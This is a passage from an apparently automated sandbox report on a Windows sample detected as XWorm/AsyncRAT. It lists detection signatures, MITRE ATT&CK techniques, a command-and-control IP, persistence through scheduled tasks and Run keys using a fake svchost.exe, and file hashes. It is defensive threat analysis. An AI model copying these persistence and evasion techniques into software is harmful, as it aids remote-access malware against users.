                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: svchost.exe, 00000003.00000002.2925287973.000000001BEB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2914398163.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6204, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FullOption_2.1Xenos.exe PID: 6632, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5280, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                Remote Access Functionality

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 0.2.file.exe.2cb6568.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2ca5528.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2cb6568.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.svchost.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.282f3c8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.FullOption_2.1Xenos.exe.281cd88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2ca5528.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2914398163.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6204, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FullOption_2.1Xenos.exe PID: 6632, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5280, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		112
                Process Injection                		11
                Masquerading                		OS Credential Dumping541
                Security Software Discovery                		Remote Services11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		21
                Registry Run Keys / Startup Folder                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		1
                DLL Side-Loading                		21
                Registry Run Keys / Startup Folder                		151
                Virtualization/Sandbox Evasion                		Security Account Manager151
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		112
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging12
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Obfuscated Files or Information                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Software Packing                		DCSync23
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583455 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 54 ip-api.com 2->54 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 16 other signatures 2->66 9 file.exe 4 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 48 C:\Users\user\AppData\Roaming\svchost.exe, PE32 9->48 dropped 50 C:\Users\user\...\FullOption_2.1Xenos.exe, PE32 9->50 dropped 52 C:\Users\user\AppData\Local\...\file.exe.log, CSV 9->52 dropped 82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->82 84 Drops PE files with benign system names 9->84 19 svchost.exe 1 5 9->19         started        23 FullOption_2.1Xenos.exe 2 9->23         started        signatures6 process7 dnsIp8 56 45.141.26.134, 49788, 7000 SPECTRAIPSpectraIPBVNL Netherlands 19->56 58 ip-api.com 208.95.112.1, 49706, 80 TUT-ASUS United States 19->58 68 Antivirus detection for dropped file 19->68 70 System process connects to network (likely due to code injection or exploit) 19->70 72 Multi AV Scanner detection for dropped file 19->72 78 6 other signatures 19->78 25 powershell.exe 22 19->25         started        28 powershell.exe 19->28         started        30 powershell.exe 19->30         started        36 2 other processes 19->36 74 Machine Learning detection for dropped file 23->74 76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->76 32 svchost.exe 1 23->32         started        34 FullOption_2.1Xenos.exe 23->34         started        signatures9 process10 signatures11 80 Loading BitLocker PowerShell Module 25->80 38 conhost.exe 25->38         started        40 conhost.exe 28->40         started        42 conhost.exe 30->42         started        44 conhost.exe 36->44         started        46 conhost.exe 36->46         started        process12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe71%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                file.exe100%AviraTR/Dropper.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\svchost.exe100%AviraTR/Spy.Gen
                C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe83%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                C:\Users\user\AppData\Roaming\svchost.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://crl.microso0%Avira URL Cloudsafe
                45.141.26.1340%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  45.141.26.134true
                  • Avira URL Cloud: safe
                  		unknown
                  http://ip-api.com/line/?fields=hostingfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.mpowershell.exe, 00000010.00000002.2314732137.000001A6FE9CC000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://go.microspowershell.exe, 00000009.00000002.1920456209.00000291D19F3000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.microsopowershell.exe, 00000010.00000002.2316272859.000001A6FEA1D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1750312345.0000024C3D849000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B96A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB07A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1778239786.0000024C4D691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900848123.00000291C94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2066095694.0000029CC05EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.copowershell.exe, 0000000E.00000002.2092526125.0000029CC8C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000010.00000002.2278365937.000001A6F619E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.microsoft.powershell.exe, 00000009.00000002.1922046061.00000291D1ECE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore68powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750312345.0000024C3D621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826532463.00000291B9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964089351.0000029CB0581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2133279074.000001A6E6131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2133279074.000001A6E6359000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    208.95.112.1
                                                    		ip-api.comUnited States
                                                    		53334TUT-ASUSfalse
                                                    45.141.26.134
                                                    		unknownNetherlands
                                                    		62068SPECTRAIPSpectraIPBVNLtrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1583455
                                                    Start date and time:2025-01-02 20:09:12 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 40s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:27
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:file.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@28/24@1/2
                                                    EGA Information:
                                                    • Successful, ratio: 9.1%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 135
                                                    • Number of non-executed functions: 4
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target FullOption_2.1Xenos.exe, PID 5276 because it is empty
                                                    • Execution Graph export aborted for target FullOption_2.1Xenos.exe, PID 6632 because it is empty
                                                    • Execution Graph export aborted for target file.exe, PID 6204 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 3964 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 6932 because it is empty
                                                    • Execution Graph export aborted for target svchost.exe, PID 1484 because it is empty
                                                    • Execution Graph export aborted for target svchost.exe, PID 2044 because it is empty
                                                    • Execution Graph export aborted for target svchost.exe, PID 3840 because it is empty
                                                    • Execution Graph export aborted for target svchost.exe, PID 5744 because it is empty
                                                    • Execution Graph export aborted for target svchost.exe, PID 5964 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • VT rate limit hit for: file.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    14:10:42API Interceptor56x Sleep call for process: powershell.exe modified
                                                    14:11:43API Interceptor130x Sleep call for process: svchost.exe modified
                                                    20:11:44Task SchedulerRun new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
                                                    20:11:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                    20:11:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                    20:12:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    208.95.112.123khy505ab.exeGet hashmaliciousNjratBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    Java32.exeGet hashmaliciousXWormBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                    • ip-api.com/json/?fields=225545
                                                    intro.avi.exeGet hashmaliciousQuasarBrowse
                                                    • ip-api.com/json/
                                                    AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                    • ip-api.com/json/?fields=225545
                                                    L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                    • ip-api.com/line/?fields=hosting

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ip-api.com23khy505ab.exeGet hashmaliciousNjratBrowse
                                                    • 208.95.112.1
                                                    XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 208.95.112.1
                                                    Java32.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1
                                                    mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                    • 208.95.112.1
                                                    intro.avi.exeGet hashmaliciousQuasarBrowse
                                                    • 208.95.112.1
                                                    AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                    • 208.95.112.1
                                                    L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1
                                                    kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 208.95.112.1
                                                    ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1
                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    SPECTRAIPSpectraIPBVNLXClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 45.141.26.234
                                                    Java32.exeGet hashmaliciousXWormBrowse
                                                    • 45.141.26.234
                                                    nklmips.elfGet hashmaliciousUnknownBrowse
                                                    • 89.190.159.77
                                                    1.elfGet hashmaliciousUnknownBrowse
                                                    • 45.141.239.79
                                                    TRC.ppc.elfGet hashmaliciousMiraiBrowse
                                                    • 45.144.191.245
                                                    da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                    • 45.141.26.234
                                                    03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 45.141.26.234
                                                    saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 45.141.26.134
                                                    windxcmd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 45.141.26.134
                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 45.138.53.54
                                                    TUT-ASUS23khy505ab.exeGet hashmaliciousNjratBrowse
                                                    • 208.95.112.1
                                                    XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 208.95.112.1
                                                    Java32.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1
                                                    mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                    • 208.95.112.1
                                                    intro.avi.exeGet hashmaliciousQuasarBrowse
                                                    • 208.95.112.1
                                                    AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                    • 208.95.112.1
                                                    L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1
                                                    kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                    • 208.95.112.1
                                                    ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1
                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                    • 208.95.112.1

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FullOption_2.1Xenos.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):654
                                                    Entropy (8bit):5.380476433908377
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):654
                                                    Entropy (8bit):5.380476433908377
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):654
                                                    Entropy (8bit):5.380476433908377
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                    Malicious:false
